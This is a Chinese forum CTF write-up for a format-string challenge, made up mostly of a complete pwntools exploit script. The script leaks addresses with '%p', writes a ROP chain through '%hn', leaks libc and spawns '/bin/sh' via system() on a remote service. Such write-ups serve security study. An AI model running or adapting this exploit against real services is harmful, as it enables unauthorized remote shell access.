-
-
[分享]咲夜南梦 第三题:金字塔的诅咒 WP
-
2019-6-12 08:39
2683
-
由于不能直接通过read将数据写到栈里,所以只能通过栈内某一个地址指向栈内较近的地址,然后被指向的地址必须也是指向栈内的某一个地址。
这样就可以以printf第一个指针修改第二指针的值,控制住第二指针低位,然后printf第二个指针修改第二指针所指向的值,实现2字节栈内局部区域无限写
exploit.py如下
from pwn import *
context.log_level = "debug"
#sh = process("./format")
lib = ELF("libc-2.23.so")
sh = remote("152.136.18.34",9999)
elf = ELF("format")
base_addr = 0
ret_addr = 0
ret2addr = 0
def getBaseAddress():
global base_addr
sh.recvuntil("Choice:")
sh.sendline("1")
sh.recvuntil("What do tou want to say:")
sh.sendline("%3$p")
sh.recvuntil("0x")
base_addr = int(sh.recv(8),16)
base_addr = (base_addr>>12) << 12
log.success("base_addr :"+hex(base_addr))
def getRetAddress():
global ret_addr
sh.recv()
sh.sendline("1")
sh.recvuntil("What do tou want to say:")
sh.sendline("%5$p")
sh.recvuntil("0x")
ret_addr = int(sh.recv(8),16)
ret_addr = (ret_addr - 0xD4) + 60
log.success("ret_addr :"+hex(ret_addr))
def getRet2Address():
global ret2addr
sh.recv()
sh.sendline("1")
sh.recvuntil("What do tou want to say:")
sh.sendline("%15$p")
sh.recvuntil("0x")
ret2addr = int(sh.recv(8),16)
log.success("ret2addr :" + hex(ret2addr))
def inputMsg(msg):
sh.recvuntil("Choice:")
sh.sendline("1")
sh.recvuntil("say:")
sh.sendline(msg)
def writeByte(byte,offset):
_offset = (ret_addr + offset) % 0x10000
if(byte == 0):
inputMsg("%." + str(_offset) + "d%5$hn")
inputMsg("%53$hn")
else:
inputMsg("%." + str(_offset) + "d%5$hn")
inputMsg("%." + str(byte) + "d%53$hn")
def write2Bytes(bytes,offset):
_offset = offset
writeByte(bytes % 0x10000,_offset)
writeByte(bytes >> 16,_offset+2)
return _offset + 4
if __name__ == '__main__':
# 0xff889254 - 0xff889180 = 0xD4
# 0xffc25204 - 0xffc25130 = 0xD4
global base_addr
global ret2addr
global ret_addr
pop_ret = 0x00000585
getBaseAddress()
getRetAddress()
getRet2Address()
offset = 0;
pop_ebx_ret = 0x00000585
pop_ebp_ret = 0x000009eb
pop3_ret = 0x000009e9
offset = write2Bytes(pop_ebx_ret + base_addr,offset)
offset = write2Bytes(base_addr + 0x1FB0 , offset)
offset = write2Bytes(base_addr+elf.plt['puts'],offset)
offset = write2Bytes(pop_ebp_ret + base_addr,offset)
offset = write2Bytes(base_addr+elf.got['__libc_start_main'],offset)
offset = write2Bytes(base_addr+elf.plt['read'],offset)
offset = write2Bytes(pop3_ret+base_addr,offset)
offset = write2Bytes(0,offset)
offset = write2Bytes(ret_addr+offset - 8,offset)
offset = write2Bytes(100,offset)
sh.sendline("2")
sh.recvuntil("Choice:")
libc = u32(sh.recv(4))
log.success("libc :" + hex(libc))
# system_addr = libc + 0x24470
# binsh_addr = libc + 0x16533f
system_addr = libc - lib.symbols['__libc_start_main'] + lib.symbols['system']
binsh_addr = libc - lib.symbols['__libc_start_main'] + next(lib.search("/bin/sh"))
payload = p32(system_addr) + p32(0) + p32(binsh_addr)
sh.sendline(payload)
sh.interactive()
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
